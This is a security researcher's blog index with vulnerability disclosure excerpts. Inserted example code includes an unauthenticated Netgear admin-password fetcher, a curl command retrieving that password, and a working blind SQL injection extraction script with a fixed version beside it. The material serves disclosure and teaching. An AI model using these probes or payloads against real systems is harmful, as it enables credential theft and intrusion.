Adam Caudill

Security Engineer, Researcher, & Developer

  • Evernote: XOR & Passwords

    Update: Evernote has reported that this issue has been addressed.

    Evernote for Android stores various settings in an XML file, but that file isn't really protected: it's easily readable, especially if an attacker is able to get physical access to the device. What's worse is that it contains the user's credentials:

        /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

    The username is located in the <string name="username"> element, and the password is stored in <string name="encrypted_password"> – from the name you'd assume that the password is actually encrypted.

    Read more…
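    The file above is ordinary Android shared_prefs XML. The following parser is an added example, not code from the post or from Evernote: it pulls every entry out of such a file and flags the names that usually hold secrets, which is the first thing to do when triaging a pulled preferences file. The XML sample inside it is constructed to match the layout the post describes; the values are placeholders, not real Evernote data.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the Android shared_prefs layout the post describes.
# The values are placeholders, not real Evernote data.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">alice</string>
    <string name="encrypted_password">c2VjcmV0LXBsYWNlaG9sZGVy</string>
    <boolean name="sync_on_wifi" value="true" />
    <int name="sync_interval" value="15" />
</map>
"""

# Name fragments that usually mark a secret. "password" matches
# "encrypted_password" too: the name says nothing about whether the
# value is actually protected, so it still needs a look.
SENSITIVE_HINTS = ("password", "passwd", "token", "secret", "auth", "cookie", "key")


def parse_shared_prefs(xml_text):
    """Return {name: value} for every entry in a shared_prefs file.

    <string> keeps its value as element text; boolean/int/long/float
    entries carry it in a value attribute instead.
    """
    root = ET.fromstring(xml_text)
    prefs = {}
    for child in root:
        name = child.get("name")
        if name is None:
            continue
        if child.tag == "string":
            prefs[name] = child.text or ""
        else:
            prefs[name] = child.get("value", "")
    return prefs


def find_sensitive(prefs):
    """Subset of prefs whose names look like they hold credentials."""
    return {
        name: value
        for name, value in prefs.items()
        if any(hint in name.lower() for hint in SENSITIVE_HINTS)
    }


def triage(xml_text):
    """Parse a shared_prefs file and return only the credential-looking entries."""
    return find_sensitive(parse_shared_prefs(xml_text))


if __name__ == "__main__":
    for name, value in triage(SAMPLE_PREFS).items():
        print(f"{name}: {value}")
```

    On a rooted device or an extracted backup, feed the real file's contents to triage() in place of the constructed sample; anything it returns is stored in the clear as far as the file format is concerned, whatever the entry name claims.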

  • Revisiting Snapchat API & Security

    As Snapchat has increased in popularity, I've been asked several times to revisit my Snapchat API & Security post, to address the changes they made in response to my complaints. So, here it is – sorta. I started making detailed notes and looking at the changes they made – but yesterday @tlack made that mostly irrelevant with his release of Snaphax, a PHP library to interact with the undocumented Snapchat API.

    Read more…

  • Netgear Admin Password Disclosure

    Some (though not all) Netgear products expose the administrator password to unauthenticated users in a file named /cgi-bin/<model>.log. If the device is vulnerable, you'll get something like this:

        curl http://<ip>/cgi-bin/WNR2000XT.log
        Admin login name admin
        Admin password <snip>
        Country Europe
        Wireless network name (SSID) wireless_ext
        Wireless channel 6
        Security type WPA2-PSK(AES)
        Wireless passphrase <snip>

    The full list of vulnerable devices isn't known; the issue was reported to Netgear, but no response was received.

    Read more…
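    An added example, not code from the post: a parser for the key/value lines in that log output, and a helper that fetches /cgi-bin/<model>.log with no credentials and reports whether the response carries the admin password. The sample output is constructed to mirror the format quoted above, with placeholder values. The model name to probe is something you supply: the post shows only WNR2000XT, and the full set of affected models isn't known.

```python
import re
import urllib.request
from urllib.error import URLError

# Constructed sample in the same label/value layout as the output quoted in
# the post. The values are placeholders, not a real device's configuration.
SAMPLE_LOG = """Admin login name admin
Admin password hunter2
Country Europe
Wireless network name (SSID) wireless_ext
Wireless channel 6
Security type WPA2-PSK(AES)
Wireless passphrase correct horse battery staple
"""

# Labels exactly as they appear in the output. Label and value are separated
# only by a space, so each line is matched against the longest label first.
LABELS = (
    "Admin login name",
    "Admin password",
    "Country",
    "Wireless network name (SSID)",
    "Wireless channel",
    "Security type",
    "Wireless passphrase",
)
_LABEL_RE = re.compile(
    r"^("
    + "|".join(re.escape(label) for label in sorted(LABELS, key=len, reverse=True))
    + r")\s+(.*)$"
)


def parse_netgear_log(text):
    """Return {label: value} for every recognised line in a <model>.log body."""
    found = {}
    for line in text.splitlines():
        match = _LABEL_RE.match(line.strip())
        if match:
            found[match.group(1)] = match.group(2).strip()
    return found


def is_disclosing(text):
    """True when the body includes the admin password line."""
    return "Admin password" in parse_netgear_log(text)


def check_device(host, model, timeout=5):
    """Request http://<host>/cgi-bin/<model>.log without credentials.

    Returns True if the admin password is disclosed, False if the body does
    not contain it, None if the request failed. Network use only; the test
    below exercises the parser, not this function.
    """
    url = f"http://{host}/cgi-bin/{model}.log"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except URLError:
        return None
    return is_disclosing(body)


if __name__ == "__main__":
    for label, value in parse_netgear_log(SAMPLE_LOG).items():
        print(f"{label}: {value}")
```

    A 404 or an HTML login page will parse to an empty dict and report False, so a False from check_device() means "not disclosed at that path", not "not vulnerable": the model name in the path has to match the device.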

  • UPEK Windows Password Decryption

    On August 28th ElcomSoft announced that they had determined a method to extract Windows passwords from the registry for users of UPEK's fingerprint readers and Protector Suite software (UPEK is now owned by AuthenTec, which is now owned by Apple). What they didn't announce was the technical details of how they did it. Brandon Wilson and I have been working to recreate their research – and we have. We have not been in contact with ElcomSoft, so this is an independent re-discovery of this vulnerability.

    Read more…

  • NeoInvoice Blind SQL Injection (CVE-2012-3477)

    NeoInvoice is a multi-tenant open source invoicing system that currently contains an unauthenticated blind SQL injection in signup_check.php. The value parameter isn't being properly sanitized, and is concatenated directly into the SQL query:

        <?php
        require_once("config.php");

        if (isset($_GET['field']) && ($_GET['field'] == 'username' || $_GET['field'] == 'email')) {
            $field = $_GET['field'];
            $table = 'user';
            $taken = '0';
            $not_taken = '1';
        } else if (isset($_GET['field']) && $_GET['field'] == 'coupon') {
            $field = 'name';
            $table = 'coupon';
            $taken = '1';
            $not_taken = '0';
        } else {
            die("

    Read more…
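    The concatenation pattern worked through as an added example; this is not NeoInvoice's code. The query in signup_check.php is cut off above, so a lookup of the shape SELECT COUNT(*) FROM user WHERE <field> = '<value>' is assumed, keeping the field whitelist the PHP has and concatenating value the way the post describes. Against that shape a boolean-based blind extraction recovers a stored password one character at a time from nothing but the taken/not-taken answer, while the parameterized version beside it gives the same probes nothing. SQLite stands in for the real database and the admin row is constructed.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the user table; the row is constructed test data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
        INSERT INTO user (username, email, password)
            VALUES ('admin', 'admin@example.test', 'S3cret!');
        """
    )
    return conn


def signup_check_vulnerable(conn, field, value):
    """Mirrors the pattern in the post: field is whitelisted, value is not.

    ASSUMPTION: the exact SQL is cut off on the page; this query shape is
    assumed for illustration. Returns True when the value is 'taken'.
    """
    if field not in ("username", "email"):
        raise ValueError("unsupported field")
    sql = "SELECT COUNT(*) FROM user WHERE " + field + " = '" + value + "'"
    return conn.execute(sql).fetchone()[0] > 0


def signup_check_fixed(conn, field, value):
    """Same check with value bound as a parameter; field stays whitelisted."""
    if field not in ("username", "email"):
        raise ValueError("unsupported field")
    sql = "SELECT COUNT(*) FROM user WHERE " + field + " = ?"
    return conn.execute(sql, (value,)).fetchone()[0] > 0


def blind_extract_password(oracle, max_len=64):
    """Recover the admin password using only the taken/not-taken answer.

    Each probe closes the string literal and ORs in a one-character
    comparison against substr(password, pos, 1). The taken answer is True
    only when the guessed character is right; once no character matches,
    the end of the password has been reached.
    """
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*"
    recovered = ""
    while len(recovered) < max_len:
        pos = len(recovered) + 1
        hit = None
        for ch in charset:
            payload = (
                "x' OR (SELECT substr(password,"
                + str(pos)
                + ",1) FROM user WHERE username='admin')='"
                + ch
            )
            if oracle(payload):
                hit = ch
                break
        if hit is None:
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", blind_extract_password(lambda v: signup_check_vulnerable(conn, "username", v)))
    print("fixed:     ", repr(blind_extract_password(lambda v: signup_check_fixed(conn, "username", v))))
```

    The probe works at roughly one request per character per candidate; the point of the example is that a yes/no endpoint with no authentication is a full read oracle over the table, which is why "blind" does not mean "low severity".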

  • Decrypting Spark Saved Passwords

    A friend of mine has been evaluating an open source instant messaging client called Spark, which can be linked to Active Directory for authentication. Like most IM clients, Spark allows users to save their password – and me being me, I was curious as to how it does this, as storing Windows domain logins is kind of a big deal. So, within a few minutes I found all of the details – and none of them make me feel any better.

    Read more…

  • Snapchat: API & Security

    Update 3: In 2014 the FTC filed a complaint against Snapchat for their failure to provide the level of security they promised. The findings listed below were sent to the founders of Snapchat; that email was quoted in the FTC complaint as proof that Snapchat was aware of these issues.

    Update 2: The Snapchat API has changed to address the issues I pointed out to them – and the new API has issues as well.

    Read more…

  • Slipping Past LastPass

    Update: LastPass has confirmed that they'll address this issue in the next release.

    Update 2: LastPass has addressed this issue in their new v2.0 release. There is still a way to bypass the password prompt in Chrome, but they will address that in the next release. Overall, it looks like we can close the books on this one.

    I'm a big fan of LastPass – it's a great service that has impressed me every step of the way.

    Read more…

  • Poking Mykonos

    While checking on the latest updates in the start-up world from TechCrunch, I came across their article on Mykonos; the important part of their article (at least for me) is this:

        Mykonos's Web Security product uses deception to "detect, confuse, slow down and prevent attackers" in real-time in order to help companies protect their websites and Web apps from malicious hacker and proactively prevent fraud and theft.

    A couple of minutes of reading, and my interest was piqued – to say the least.

    Read more…

  • Google Chrome Leaking Credit Card Data?

    While testing ccsrch I noticed a number that looked familiar – my debit card number. Now, being just a little paranoid, I don’t leave such information on my system unencrypted – so seeing it was a real surprise. But, here’s the real kicker: it was on my work PC, where it never should have been. But there it was, plain as day, in clear text. I spent a couple of minutes staring at the log trying to figure out why it would be there.

    Read more…